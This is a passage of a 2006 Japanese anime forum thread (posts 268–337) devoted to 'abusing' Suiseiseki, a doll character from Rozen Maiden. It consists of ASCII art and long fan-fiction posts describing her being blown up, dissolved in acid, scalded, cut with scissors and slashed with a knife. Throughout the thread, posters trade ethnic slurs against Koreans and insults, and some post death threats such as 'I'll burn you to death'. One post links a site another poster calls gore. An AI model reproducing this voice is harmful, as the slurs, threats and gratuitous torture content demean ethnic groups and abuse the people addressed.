おかげ様で優勝できました
本当にありがとうございました

268 :名無しちゃん…電波届いた?:2006/10/29(日) 22:16:37
良スレ発見記念カキコだお^^

>>267
よしっ、最萌で優勝したお祝いに、糞翠に花火を見せてあげるお^^

もちろん使うのは、糞翠を括り付けたダイナマイトだおwwwwwwwwwwww

269 :名無しちゃん…電波届いた?:2006/10/29(日) 22:25:00
.                  ____
                 /__/|
.               く/'二二ヽ>
.              _|l |ノ。ノイハ))___
                 /  ノl_|#:;)Д。#)   /|
             | ̄ ⊂=====⊃ ̄ ̄| |
             |___=====' ___.|/
.                 ∪ ∪| |
.                 |   | |
.                 |   | | 
.                 |   | | 
   おっ♪        /,/-_-_-_-_-_\    おっ♪
        ( (   /,, /―[優勝]――\        //
             (。'。、。●,。,。,。,。,。,。,。,。● ) )
    おっ♪     i||i 人i||i:||::人_][_¥人:::||.i||i
             †人=†††¶┌┐¶††††    おっ♪
  /⌒ヽ/⌒/⌒ヽ[/⌒ヽ/⌒ヽ/⌒ヽ ] /⌒ヽ ⌒ヽ /⌒ヽ
 ( ^ω( ^ω□二二( ^ω( ^ω( ^ω^).□ ^ω^ ) ω^)□ ω^)
 ( |つ⊂|_ | | ノつつ|祭)~| |祭) ̄||祭) ̄|つ ⊂|_((|祭)~ノ | ) )つ
  〓_| |__〓」 〓_|=|_ 〓__ノ 〓二ノ〓二ノ) ( / (L〓|〓二|〓=〓ヽ
  し'し' (_(_ し(_) (_)_)し(_)し(_)(_(_,(_)(_)し'  (_)

         翠 た ん お め で と う だ お w

270 :名無しちゃん…電波届いた?:2006/10/29(日) 22:25:32
  よ〜し翠星石。最萌トーナメントに優勝したお祝いに、
ドールの穴って言う翠星石にとっての天国に連れって上げるよ。
.      ,lヽヘ/ヽ ___
     <    く/',二二ヽ>
     / ノlノ^^ノノ|l |ノノイハ))
     ヾcリ口ヮ |l |リ^ヮ^ノ|  デスゥ♪ソコハキットラクエンデスネ
       l llつノlとl_介」つ
       |._ハ_ミく,,つ,,つ〉ミ
.     (( ゝ' ゝ'
""""""""""""""""""""""""""""""""""""""""""

271 :名無しちゃん…電波届いた?:2006/10/29(日) 22:26:19
         ほーら、翠星石の天国だよw
              ,lヽヘ/ヽ
             <     へ
             / ノlノ^^ノノリ>、
             ヾcリ口∀口ゝ il|    lll
               l llつ lつ   lil lll
               |._ハ_.|   ‖ ||| lll
.               ゝ' ゝ'     ___
""""""""""""""""""""""""";; ||l.く/',二二ヽ>l|l デスゥーーーーー!!"""""
                      ;;   |l |ノノイハ))    ;;
                      ;;   |l |ili>o<ノl|   ;;
                      ;;  ノl⊂l_介」⊃   .;;
                      ;;  ミく,,つ,,つ〉ミ   ;;
                      ;;            ;;
                      ;;            ;;
                      ;;            ;;
                      ;;_          ;;
                      ;;. 、、ヽ        .;;
                      ;;ノリノ))      ∩ ;;
                      ;;々゚ノミ));;i><i∝∝;;
                      ;;゙*";;ζ∽λω ,.,.,.,, ;;
                      ;;(ム!;;⊂)夲/((ノ。;;;ム);;
                      ;;((ミi!;;ζ,,;;);(;;);⊃;;つ;;

272 :名無しちゃん…電波届いた?:2006/10/29(日) 22:50:21
翠星石は叩かれる義務がある。
それは荒らされて嫌な思いをしているなのはスレ住人の怨念だ。
http://anime.2ch.net/test/read.cgi/anime2/1161925832/
叩かれて叩かれてゴミのように扱われて、そして死にやがれ。
                 /⌒ヽ
             キタネー ( ^ω^ )       /⌒ヽ 
   /⌒ヽ         /    ,\      (^ω^ )  今年の最萌厨はこいつか
   ( ^ω^)        | l    l |     /    ,\ 
  /    \        | .;|;;:。;:,:、| ;|    ..,. | l    l |
  | l    l |     ..,. ., ヽ '゚;_。:_;./ /;-゚;・,。:゚;:.゚|;;|.   | ,|
  | |    | _|。.:_::゜。-.;.:゜;/_ン∩ソ/\;;:;.:.。:  ヽ '゚;。_ / /  糞尿まみれの工作主犯
  ヽ \_ .。'゚/   `。:、`;゜::;.:、,:゚;: .:..゜:: ゚。:..;: /_ン∩ソ/\   
   /\_ン∩ソ\    ゚ ;:゚..゜:: ゚。:.:.:゚; ゚ ;:゚..;゚;  /  /`ー'ー'\ \
.  /  /`ー'ー'\ \    ゚ ;:゚..゜:: ;。:.:.::゚。;:;.:ヽ  <     / /
 〈  く     / /    ゚ ;:゚.。゜:;゚;゚.。.:`;:;.:.。 \ \    / /
.  \ L   ./ /     .;.:.;.゜::: ;。: ;:゚.゜:: :  .〉 )  ( .く,
    〉 )  ( .く,     ゚.;゚;:;。 ___ヤメロデスゥ(_,ノ   \.`)
   (_,ノ    .`ー'     ;:く/',二二ヽ>:゜;.;.
                ゚;:;|l |ノノイハ)):;。..;
                ゚:;:|l |リ`Д´ノ|;:゜..:
                 ~~~~~~~~~~

273 :名無しちゃん…電波届いた?:2006/10/30(月) 22:28:22
きちがい!!!!!!!!
>>1-272を殺さなくては!!!!!!!

274 :名無しちゃん…電波届いた?:2006/10/30(月) 22:31:12
はぁ・・・やっぱりきたかこの基地外

275 :名無しちゃん…電波届いた?:2006/10/30(月) 22:55:29
>>273
糞翠のドラマCD聴いた感想だけどぉ…^^;

真紅「皆離れなさい、このままじゃいい的だわ!」

このシーンで、糞翠が的になれば良かったのに…
#^^ ビキビキ

276 :名無しちゃん…電波届いた?:2006/10/30(月) 23:47:05
ホント真紅は損な役回りが多くて可哀相だね。

277 :名無しちゃん…電波届いた?:2006/10/31(火) 01:38:25
だって真紅は朝鮮人だもの!!!!!!あの目つきを見てよ!!!!!!半島へ帰って!!!!!

278 :名無しちゃん…電波届いた?:2006/10/31(火) 01:42:15
初めてまともに喋ったと思ったら、関係ない真紅を蔑む始末・・・
もう寝ろ、そして二度と目覚めるな。

279 :名無しちゃん…電波届いた?:2006/10/31(火) 01:49:19
↑うっせしばくぞはげ!!!!!!ヴぉけ!!!!!!!
真紅は整形デブス朝鮮人朝鮮人朝鮮人朝鮮人!!!!!!!!

280 :名無しちゃん…電波届いた?:2006/10/31(火) 01:52:26
そして都合が悪いと血相を変えて相手を罵る・・・愚かなり。

281 :名無しちゃん…電波届いた?:2006/10/31(火) 02:38:19
糞翠もトンでもない お下劣おたんちんに好かれたもんだお…^^;
こんなのがいるから、糞翠厨なんて俗語が生まれるんだお ^m^ウププ

282 :名無しちゃん…電波届いた?:2006/11/01(水) 14:20:12
誰か!!!!臭い真紅の下痢便スレを立てて!!!!!!!!

283 :名無しちゃん…電波届いた?:2006/11/01(水) 19:00:44
自分で立てればいいじゃん、どうぞご勝手にw

284 :名無しちゃん…電波届いた?:2006/11/01(水) 19:18:37
>>282
             / ̄ ̄^ヽ                  / ̄ ̄^ヽ
             l      l       ____       
       _   ,--、l       ノ .     /_ノ  ヽ、_\     丶      l ,--、  _
   ,--、_ノ:: `ー'::   、ミー---‐,,l     o゚((●)) ((●))゚o     l,,‐---ー彡,  ::`ー'  ::ゝ_,--、
  ,/   :::         i ̄ ̄  | .  /::::::⌒(__人__)⌒::::: \    |   ̄ ̄i        :::   ヽ,
/           l:::    l:::   ll   |     |r┬-|     |    ll    :::l   :::l         ^ヽ
l   l .   l     !::    |:::   l   |     | |  |     |    l    :::|   ::!   l    l   l
|   l   l     |::    l:    l .  |     | |  |     |   l     ::l  :::|    l   :l   |
|   l .   }    l:::::,r-----   l  \    | |  |    /   l  -----、_::::::l    }   l   |
ヽ  :l::::   ト:;;;;;;;;;/-/__...........  /.        | |  |         ヽ  ...........__ノヽ;;;;;;;ノ  ::::l  /
                           | |  |
                           | |  |
                            `ー'´

285 :名無しちゃん…電波届いた?:2006/11/02(木) 13:06:41
>>282
糞翠を動物園に連れてって、ワニの餌場に放り込んでやりたいお^^
ワニです、ワニですぅ〜とか言って逃げ回る生き人形見たさに、間違いなく客が寄って来るお^^

286 :名無しちゃん…電波届いた?:2006/11/03(金) 23:51:29
>>284
なにそのきもちわるい顔!!!!死んで!!!!!
>>285
朝鮮人死んで!!!!!絵文字なんか使って!!!いやらしい!!

287 :名無しちゃん…電波届いた?:2006/11/04(土) 00:56:16
>>286
なんで糞翠ごときでそんなに必死になれるん?

288 :名無しちゃん…電波届いた?:2006/11/04(土) 07:53:20
>>286
在日チョン乙だお^^
糞翠の料理食べたいお^^

289 :名無しちゃん…電波届いた?:2006/11/04(土) 18:49:53
翠ちゃんの手料理私も食べたいわ!!!!!

290 :名無しちゃん…電波届いた?:2006/11/04(土) 19:39:53
>>289
おっ、やっとおら達と糞翠を虐待してくれる気になったのかお^^ ?

それじゃ、友好の記念に
糞翠「の」料理一緒に食べるお^^


糞 翠 の 料 理 一 緒 に 食 べ る お ^m^

291 :名無しちゃん…電波届いた?:2006/11/04(土) 19:59:48
本日のメニューは「翠星石のタタキ」でございます。どうぞお召し上がりくださいw

292 :名無しちゃん…電波届いた?:2006/11/04(土) 23:38:28
翠ちゃんの料理は世界一!!!!みんなでたべようね!!!!

293 :名無しちゃん…電波届いた?:2006/11/05(日) 00:36:03
本当に藻前の脳味噌は平和だなw

294 :名無しちゃん…電波届いた?:2006/11/05(日) 02:00:02
だって朝鮮人と違って私は恵まれているのだもの!!!
貧しい朝鮮人は人肉をたべるそうじゃないの!!!恐ろしい!!!!!

295 :名無しちゃん…電波届いた?:2006/11/05(日) 09:36:13
>>294
一体何時の時代の話してんだお m9(^Д^)プギャー
ひょっとして1950年生まれの方ですかぉwwwwwwww

糞翠にガムだと偽ってプラスッティック爆弾喰わせたいお^^

296 :名無しちゃん…電波届いた?:2006/11/05(日) 17:11:26
でも真紅の肉は見るからに筋張って固くてまずそう!!!!臭そう!!!!
柔らかい翠ちゃんのお肉なら狙われても仕方ないわね!!!!

297 :名無しちゃん…電波届いた?:2006/11/05(日) 20:04:44
「ローゼンメイデン」において、翠星石の虐待以上に語るのが楽しい事はないお^^
奴は人間様に虐待されてこそ、真価を発揮するドールだお^^

298 :名無しちゃん…電波届いた?:2006/11/05(日) 21:11:21
>>297
全くだお^^
原作でもアニメでも、糞翠が出しゃばる話はゴミそのものだお^^
ってか君、おらの真似上手だお^^

糞翠の髪の毛を、ニシキヘビ使って結ってやりたいお^^
おらって本当に家畜思いな良い奴だお^^

299 :名無しちゃん…電波届いた?:2006/11/06(月) 01:37:56
>>297-298
いま酷い自演を見たわ!!!!!翠ちゃんが憎いのはあなた一人なのじゃないの??????
根暗朝鮮人!!!!!!!!

300 :ツンデレ萌:2006/11/06(月) 03:32:54
おまいら翠星石を好きになれ
これはツンデレ萌からのプレゼントだ

http://info.from.jp/mu/robom.cgi?mode=msg&nono=4555&tp=1&comment=

301 :名無しちゃん…電波届いた?:2006/11/06(月) 09:23:44
>>299
もしかしたら自演じゃないかもしれないのに、この早合点…。
コイツ、現実でもこうやって周りのペース乱しまくりで暴走してんだろうなw
全く、リアル朝鮮人様には勝てる自信がないぜ。

302 :名無しちゃん…電波届いた?:2006/11/06(月) 16:54:47
>>301
相変わらず異様に朝鮮人を差別するし、まさに愚の骨頂だよな。
それに、虐待スレにほぼ毎日顔出してる上に嫌がらせ書き込みまでしてく
自分こそ、十分根暗で陰湿だって気付かないのかね〜wwwwwwwwwwwwwwwww

303 :名無しちゃん…電波届いた?:2006/11/06(月) 18:36:57
>翠ちゃんが憎いのはあなた一人なのじゃないの??????
糞翠が好きなのはテメェ一人だけじゃねぇの??????

304 :名無しちゃん…電波届いた?:2006/11/06(月) 21:31:00
いやがらせをやめて!!!!!!

305 :名無しちゃん…電波届いた?:2006/11/06(月) 21:53:19
草花に水やる翠星石
「すこやかに〜のびやかに〜緑の葉をひろげて大きく育てですよ、おまえたち♪」

「そこまでだっ!」
「な、なんだ貴様らですぅ!?」

「我々は麻薬取締捜査官だ!ここで大麻の不法栽培がされてると通報があった、これより強制捜査に入る!」

「いやぁ!何勝手に入ってくるですか!?
ああっ?!葉っぱをひっこ抜くなです!やめるです、この子たちに罪はねーのです!」
「これらは証拠物件として確保するのだ」
「うう…す、スィドリ〜ム!」
「抵抗するか!かまわん発砲しろ!」

警官隊に蜂の巣にされる翠星石であった。

306 :名無しちゃん…電波届いた?:2006/11/07(火) 19:12:23
>>304

             -― ̄ ̄ ` ―--  _        
          , ´         ,    ~  ̄、"ー 、 
        _/          / ,r    _   ヽ ノ
       , ´           / /    ●   i"
    ,/   ,|           / / _i⌒ l| i  |
   と,-‐ ´ ̄          / / (⊂ ● j'__   |
  (´__   、       / /    ̄!,__,u●   |   <またDQNが来たクマ
       ̄ ̄`ヾ_     し       u l| i /ヽ、     今日も嫌がらせしに来たクマ・・・
          ,_  \           ノ(`'__ノ
        (__  ̄~" __ , --‐一~⊂  ⊃_
           ̄ ̄ ̄      ⊂ ̄    __⊃
                   ⊂_____⊃


307 :名無しさん?:2006/11/08(水) 09:22:45
         ≦_ ̄_ ̄─
  _ ─       ≦_   )
≦_    )        ̄≡/
  ≦_ ≡\       /
          \Γ 了/      ;:.ガッ! :;:.,:;;ガッ!
.           |.@|        ・;..'・;..・;..'・;..ガッ!
 キュイーン・・・!   /|  .| \  "・;..';゙;・;..'・;."・;..';゙;・;..'・;.ガッ!ガッ!
        /  .|   |  \ミ ̄─ ≧_。;く/',二二ヽ>"・;..';゙;・;..'・;.ガッ!
       / ミ   |   |   (    <  >|l |ノノイハ))∩.'` ・;..'・ガッ!
       (    ̄ ≧_ ・;..';゙;・;..'・;..rノl_|リ(#)゚々。ノ|/;;`..',,,'`;;,,.ガッ!
         ─_  _≧∴゙;:;:.,:;;∴゙;:;∴゙;:;:.,:;;ガッ!
            ̄ ∴゙;:;:.,:;;;グモッ∴゙;:;:.,:;;; チュイーン

倍速でもっかい食らえ

         ≦_ ̄_ ̄─
  _ ─       ≦_ ● )
≦_  ● )        ̄≡/
  ≦_ ≡\       /     '・;.ガッ!'・;.ガッ!'・;.ガッ!
          \Γ 了/      ;:.ガッ! :;:.,:;;ガッ!,:;;ガッ!'・;.ガッ!
.           |.@|        ・;..'・;..・;..,:;;ガッ!'・;..ガッ!,:;;ガッ!
 キュイーン・・・!!  /|  .| \  "・;..';゙;・;,:;;ガッ!..'・;."・,:;;ガッ!;..';゙;・;..'・;.ガッ!ガッ!
        /  .|   |.  \ミ ̄─ ≧_。;く/',二二ヽ>"・;..';゙;・;..'・;.ガッ!
       / ミ   |   |   (●   <  >|l |ノノイハ))∩.'` ,:;;ガッ!,:;;ガッ!・;..'・ガッ!
       ( ●  ̄ ≧_ ・;..';゙;・;..'・;..rノl_|リ(#)゚々。ノ|/;;`..',,,',:;;ガッ!`;;,,.ガッ!
         ─_  _≧∴゙;:;:.,:;;∴゙;:;∴゙;:;:.,:;;ガッ! でぐぅー!
            ̄ ∴゙;:;:.,:;;;グモッ∴゙;:;:.,:;;; チュイーン,:;;ガッ!'・;.ガッ!
                       '・;.ガッ! '・;.ガッ!'・;.ガッ!,:;;ガッ!

308 :名無しちゃん…電波届いた?:2006/11/08(水) 18:58:59
ここかしら!!!???きちがいのすくつは!!!???

309 :名無しちゃん…電波届いた?:2006/11/08(水) 19:05:06
>>308探し当てたご褒美だw

毎日毎日、糞翠星石は「チビ人間」等と人を馬鹿にした発言をしてくるが、僕はついに堪忍袋がブチキレた。
外に外出し、家に帰宅する。
扉を開けると糞人形が手を腰に当て、右手で僕に指を指してえらっそうに言ってきた。
「くそチビ人間!!どこ行ってたですか!三時のおやつの時間とっくに過ぎたじゃないですか!おやつとっとと用意するです!」
ブチ……
いつも我慢してきたが、今日で我慢の限界が来たんだ。
こいつのカン高い声にえらっそうな態度…
僕は握り締めた拳が切れる位に怒り爆発した。
「ヒィッ!!」
糞人形は僕の変わり果てた形相を見て、逃げ出した。
「待ちやがれ!!」
「ぶべっ!!」
僕は糞人形のスカートの裾をふみつけ、糞人形を捕まえた。
糞人形はスカートを踏みつけられたせいで顔から床に倒れこんだ。
「何をするですか!!痛いです!!」
ウザい……
僕は倉庫からチャッカマンと彫刻刀を取りだし、彫刻刀を翠星石の額におもいっきり突き刺した。
「ぎゃあああ!!」
彫刻刀が刺さったまま、壁に彫刻刀を刺し、翠星石をぶら下げた。
「人形は死なないから便利だよなぁ…」
「ひっひぃぃっ!!」
僕は翠星石の頬にジャンクと余った彫刻刀で刻む。
「いやぁあ!翠星石を刻まないでですぅっ!!」
ガリッガリガリ…

310 :名無しちゃん…電波届いた?:2006/11/08(水) 22:30:31
>>300
グロサイト貼んな、ボケw

311 :名無しちゃん…電波届いた?:2006/11/09(木) 19:09:30
>>308
A「おまえ翠星石にハアハアしてんだ〜、きめえw」
B「こいついじめようお^^」
>>308「や、やめてくれよお・・・」
A「翠星石の着信ボイスとか聞いてしこってんだろ?」
B「それとも、ローゼンカレンダーの卑猥なポーズの糞翠見てやってるのかお^^?」
A「ツンデレ萌え〜って思いながら見てんだろ?」
B「翠たんにハァハァしたのかお^^?きもいお〜^m^」
>>308「嫌がらせをやめて!!!この朝鮮人!!!!!!あ〜、早く帰って翠ちゃんの手料理食べたいわ!!!!!」
周り「ヒソヒソ」

312 :名無しちゃん…電波届いた?:2006/11/09(木) 20:32:35

        く/',二二ヽ>  っ
         |l |ノノ。イハ))   っ
.         ノl_|リ# 々゚ノl| あー・・・あ"!!・・・うー・・・う・・・ぅ・・・
         / つ大O
≡     /"( ),==r' `ヽ  
       ! *し)__.| * !
   ≡  ◎、_彡" ヽ、_彡
                      _______
                      |          |
                    ( ⌒ )         |
                      l | /|          |
                   く/',二二ヽ> TOILET   |
                    |l |ノノ。イハ))        .|
                   ノl_|リ# 々゚ノl| で・・・でずぅーーーーー!!
                  /,   つ◎        |
.              ブリッ!(_(_  / |          |
                  //レヽJ |          |
.                 ●       ̄ ̄ ̄ ̄ ̄ ̄ ̄

313 :名無しちゃん…電波届いた?:2006/11/09(木) 20:33:23
                  __________
                /|               |\
              /  |    今脱糞中ですっ!見るなですっ!
            /    |       ___       |   \
    , .-=- ,、   |     |     .く/',二二ヽ>    |     |      想像以上に下劣ね
 ヽr'._ rノ.'   ',   |     |     |l |ノノイハ))    |      |  ,'~~~え
 //`Y. , '´ ̄`ヽ |    |     |l |リ;゚д゚ノl|    |      | {/´ ̄ヽヽ_,
 i | 丿 i ノ '\@  |     |   ∫ /   つ       |     |((从_从)i@《,
 ヽ>,/! ヾ(i;゚ ヮ゚ノ  |     |   ∬ (_(__⌒)  |^lヽ、 |      .|||从゚- ゚ ||/||
  `ー -(kOi∞iミつ(|◎     |   ●┌―(_)─┘|  ).|   ◎|)と{'ミ介ミ'})||
      (,,( ),,)  |       |      ̄ ̄ ̄ ̄ ̄ ̄  |     |≦ノ,ノハヽ、≧
.       じ'ノ'.  |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\    |て` -tッァ- ' て
             |   /                   \  |
             |/                        \|

314 :名無しちゃん…電波届いた?:2006/11/10(金) 01:10:38
翠ちゃんはうんちしない!!!!!真紅は臭くて太いのをするわ!!!!お下劣!!!!!

315 :名無しちゃん…電波届いた?:2006/11/10(金) 08:04:28
こいつきっと水銀燈や雛苺も嫌っているんだぜ・・・。

316 :名無しちゃん…電波届いた?:2006/11/10(金) 21:02:29
>>314
糞翠をお風呂に入れてきれいにしてあげたいお^^
ほ〜ら、浴槽にいっぱいの硫酸の中で…あれ? 跡形も無く溶けちゃったお^^;

317 :名無しちゃん…電波届いた?:2006/11/12(日) 03:21:15
翠星石を殺さなくては……そうだ…あんな性悪毒舌人形を野放しに
する訳には行かない…。

318 :名無しちゃん…電波届いた?:2006/11/13(月) 14:12:19
最近日本語不自由な朝鮮人見ないお…^^
糞翠厨は根性なさすぎだお^^;

糞翠の書いたジュンへの手紙をトイレットペーパーとしてリサイクルしたいお^^
えっ、ダメなのかお?
ミミズがサンバ踊ってる様な字ばっかだから、失敗したやつかと思ったお…^^;

319 :名無しちゃん…電波届いた?:2006/11/13(月) 17:40:27
「空気が乾燥してるせいか目が渇くですぅ、目薬よこしやがれですぅ」

「え〜とどこだったかな」ゴソゴソ

「とっとと出しやがれです。まったく役立たずです」
(ムカッ)「ほら、あったぞ」

「よこしやがれですぅ!」(目薬使用して目をパチパチさせようとする)

「?!目、目が開かねーですぅっ!!」


(さすが『瞬間接着剤』だなw)

320 :名無しちゃん…電波届いた?:2006/11/13(月) 19:43:31
チラシの裏

糞翠のドラマCDをベランダに吊してから、うるさいカラスが寄り付かなくなったお^^
最高な気分だお^^

321 :名無しちゃん…電波届いた?:2006/11/16(木) 21:33:10
      ___   ♪
     く/',二二ヽ>    
     |l |ノノイハ)) )) すこやかに〜のびやかにぃ〜
 ((  |l |リ゚ ヮ゚ノl| 
     ノl⊂l_介」つ0匚lア ミミ
    ≦ノ`ヽノヘ≧     ミミ
.   ミく二二二〉ミ     wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww


  ,ィ^i^ト、
 《y'´ ̄`ヽ
  {  {八{从)}  みっくるんるん♪
 ノ,イ| ゚ヮ゚ノリ 
.(w (つ={=}つ
  く:/i__j \, ', ´
ww(./(.、、、(((.@)、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、

322 :名無しちゃん…電波届いた?:2006/11/17(金) 08:24:21
      ___   
     く/',二二ヽ>    
     |l |ノノイハ)) )) 乳牛みるくの分際で翠星石の邪魔するんじゃねーですぅ!
 ((  |l |#゚听ノl| 
     ノl⊂l_介」つ0匚lア ミミ
    ≦ノ`ヽノヘ≧     ミミ
、、、、、ミく二二二〉ミ、、、、、、、、wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww


                                    ,,,,  ,;;;;;;;;;;;;;;;;,;;;;;
        ──────────────    ,;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                               ,,,;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  みっ みくるビーム!                ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; っ
    ,ィ^i^ト、              ..........::::::::::::::''''''''';;;;;;;;;;;く/',二二三三 ニ
   《y'´ ̄`ヽ      ..........::::::::::::::::::::::''''''''''''''   :;;;;;;;;;;;;;;;;|l |ノノイハ― 三 ニ
    {  {八{从)}   ::::::::::::::             ;;;;;;;;;;;;;;;;;;;;;;|l |リ`Д゚'三 ニ −
   ノ,イ|#゚ヮ゚ラ)ノリ::::::.::: :               ;;;;;;;;;;;;;;;⊂i,l_介」j- =つ ̄- _0匚lア
.  (w⊂}:}丕{彡  :::::::::::::::::.........................       ;;;;;;;;;≦ノ`ヽンヘ≧三 ニ
    く:/i__j ゝ      '''''''''''''''''''''''':::::::::::.......;;;;;;;;;;; ;;;;;;ミく三三三〉ミ―_ ̄
wwww~じテ'────────────       ;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;
      ────────────────    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  ,;;;;;;;;

323 :名無しちゃん…電波届いた?:2006/11/18(土) 21:33:14
乳牛みるくワロタw

324 :名無しちゃん…電波届いた?:2006/11/21(火) 15:55:55
「チビ人間〜何処にいるです〜?翠星石にお茶をいれやがれですぅ〜」 
「っち!まったく五月蝿いんだよ!こっちは勉強で忙しいんだよ!無視無視!」
ガチャ
翠星石が部屋に入って来た。
「こんなとこにいやっがたですかチビ人間。こんなとこに引き篭もってないでさっさと翆星石にお茶お入れやがれですぅ」
「・・・・・・・・。うるせえな。今勉強で忙しいんだよ。茶くらい自分で入れやがれ、この性悪人形」
「勉強?チビ人間のくせに生意気ですぅ〜。そんなことしてる暇があるならとっとと翆星石にお茶を入れるですぅ」
「はぁ…。しょうがない、これ以上騒がれると勉強できないし早く茶を入れて黙らせよう。」
キッチンに降りお茶を入れ始めるジュンに翆星石は、
「チビ人間の入れるお茶はいつもまずくて飲めたもんじゃねぇですから、今日は翆星石の事を思って美味しく入れるですよ」
カチンッ
頭に来たジュンはすぐそばに居た翆星石におもいっきり蹴りをかます。
「ぎゃんっ!」
翆星石壁にぶち当たった。
「何しやがるです!このチビにん・・・・。」
「うるさいっっ!!これ以上グダグダ言うとばらすぞ!!」
「うぅ・・・ですぅ〜」
とりあえず五月蝿いのを黙らせるとジュンはお茶を入れ始めた。優しいヤツである。
そして2つのカップに出来あがったお茶を入れる。
「ふぅ〜」
一度はキレたジュンだがお茶を飲みゆったりしたことで、だいぶ落ち着きを取り戻しつつあった。
「休憩もしたし、次は苦手な数学でもするかなぁ〜」等と、次の勉強のことに思いをはせていた。
そんなジュンの隣で翆星石は……。

325 :名無しちゃん…電波届いた?:2006/11/21(火) 15:56:58
「オウェ!やっぱりチビ人間の入れるお茶は飲めたもんじゃねぇですぅ!」
ピクッ
「翆星石を蹴り飛ばしたくせにお茶もろくに入れられねぇなんてとんだ役立たずですぅ」
ブッチンッ!!
落ち着きを取り戻しかけていたジュンだがさすがにこのときばかりはキレた。
「バチャバチャビチャバチャ」
翆星石の頭に出来たばかりのお茶をぶっかける。まだ相当熱いだろう。
「きゃああああああっっっ!!!!!熱いでずっーーー!!!!!!」
頭を抱えて転げまわる人形を見て、ジュンは汚い物を見るかなように見下していた。
そしておもむろに台所に向かった。
「はぁはぁはぁ…。死ぬかと思ったですぅ〜。チビ人間!この誇り高い翆星石に何しやがる…ですぅ…??」
辺りを見回すもジュンの姿が見当たらない。
「チビ人間!何処に居やがるですぅ!ささっと出て来て謝るですぅ!!」
「ここだよ」
後ろから声がして翆星石は振り返った。
「あれ…ですぅ」
何故かいつもより頭が軽い気がし、何気なく髪に手をやると…。
「無い!無いですぅ!翆星石髪がっ!!」
そう、ジュンが切ったのだ。ドールたちは当然髪は生えない。
しかもジュンが適当に切ったためひどく不揃いである。
「よくも…よくもお父様に戴いた大切な髪を!!生えてこないのにどうしてくれるですぅ!!!」
「五月蝿い。黙れ。僕を怒らせたお前が悪い」
ジュンは酷く冷たく言った。
「うぅ…翆星石の髪が…髪が…」
翆星石は瞳を涙でいっぱいにしながら自分の髪を見ていた。
「ジョキン!」
「!?」
また髪を切られたのかと思ったがどうやら違う様だ。
何気無く下に目をやると…。

326 :名無しちゃん…電波届いた?:2006/11/21(火) 15:58:14
「!!!!!!!!!!!!!」
「きゃああああっっっ!!翆星石のドレスが穴だらけの傷だらけですぅーー!!」
そう、髪の次は大事なドレスを傷つけたのだ。
「うぅ…お父様に戴いた大切な物が次々と…グスングスン…ですぅ…」
「ジョキン!」
また後ろで切る音がした。
「もうこれ以上翆星石の大切な物を壊すなですぅ!」
翆星石はジュンの手に噛み付いた。
「いでっ!糞!このジャンクめ!」
ジュンは翆星石を思いっきり床に叩き付けた。
「遂に僕に傷を付けたな!」
手に傷をつけられたジュンは遂に翆星石本体に攻撃を始めた。
まずは左脚に鋏で傷を付け始めた。
「イタ!イタイ、イタイですぅ!止めやがれですぅ!グスン」
翆星石は泣きながら抵抗した。
しかし、力で人間に勝てる訳も無く無駄な抵抗におわる。
当然鋏では深い傷は付かない。
しかし、なんともいえない痛さが延々と続き翆星石は10分間地獄を味わった。
「よし。もういいかな」
翆星石の左脚はもう傷だらけになっていた。
だが、壊れているわけではないので、歩行には問題無さそうだった。

327 :名無しちゃん…電波届いた?:2006/11/21(火) 15:59:05
「やっぱ、これじゃつまんねーな」
「ゲシッドコッグギャドコッ」
ジュンは左脚を踏み砕き始めた。
「ギャッ!や、やめろですぅ!これ以上やったら本当にジャンクになってしまうですぅ!」
「うるさい!お前は最初からジャンクだ!」
「ゲシッドコッグギャドコッ」
左脚は鋏で受けた傷と蹴りでベコベコに変形し、膝、足首の関節がいかれていた。
「んじゃ、最後にっと…」
そしておもむろに包丁を取り出し顔の近くに持っていった。
「ひぃっ!顔は顔は止めてくれですぅ!顔はドールの命ですぅ!」
「スパッスパッ!」
「きゃああああーーー!!痛いですぅーー!!」
左頬には見事な十字傷が刻まれていた。
そして目の前に鏡を置く。
「顔に!顔に傷がぁ!!うぅっ…翆星石の顔が…。うあああ〜あん顔が顔がぁ〜…グスングスングスン…」
「これにこりたらもう生意気なこと言うんじゃねーぞ。次はこんなもんじゃ済まないからな」
「うぅ…」
翆星石は言い返せないくらい心に傷を受けたのだった。

328 :名無しちゃん…電波届いた?:2006/11/21(火) 16:02:04
アニオタ キモ杉・・・。

329 :名無しちゃん…電波届いた?:2006/11/21(火) 18:50:19
上がってきたスレをたまたま見かけただけのくせに何を今さらw

330 :名無しちゃん…電波届いた?:2006/11/23(木) 13:43:57
相変わらずのようね、朝鮮人ども!!!!!!!!!!!!!!!!!!!!
翠ちゃんを虐めると天罰が下るわよ!!!!!!!!!!!!!!!!!!!!!!!!!!!!

331 :>>320ならこう言うだろう:2006/11/23(木) 16:14:53
わざわざ携帯からのカキコご苦労さんだお^^
朝鮮人はしつこさだけがとりえだお^^

332 :名無しちゃん…電波届いた?:2006/11/23(木) 18:25:52
↑うせろ!!!!!!!!朝鮮人野郎!!!!!!!!!!!!!!!!!

333 :>>320ならこう言うだろ:2006/11/23(木) 22:20:01
自分が朝鮮人だからってそんなにムキにならなくてもいいのに^^;
糞翠厨は恥ずかしがりやさんだお^^

334 :名無しちゃん…電波届いた?:2006/11/23(木) 23:35:35
>>330>>332
朝鮮の人、お久しぶりだお^^
再会記念に、一緒に真っ裸にひんむいた糞翠視姦しようお^^

>>331>>333
見事な代弁乙ですお^^

朝鮮人の奴ったら、国語の勉強そっちのけで皆に迷惑かけて…全く困った奴ですお^^;

335 :名無しちゃん…電波届いた?:2006/11/24(金) 19:16:14
>>333>>334
氏ねキチガイ!!!!!!!!!!!!!!!!焼き殺すぞ!!!!!!!!!!!!!!!!!!!!!!!!!!!!

336 :名無しちゃん…電波届いた?:2006/11/24(金) 19:30:34
>>335
しつこい上に、おっかない朝鮮人だお…^^;

それにしても寒いお><
糞翠の頭に火点けて焚き火したい気分だお^^

337 :名無しちゃん…電波届いた?:2006/11/24(金) 19:41:07
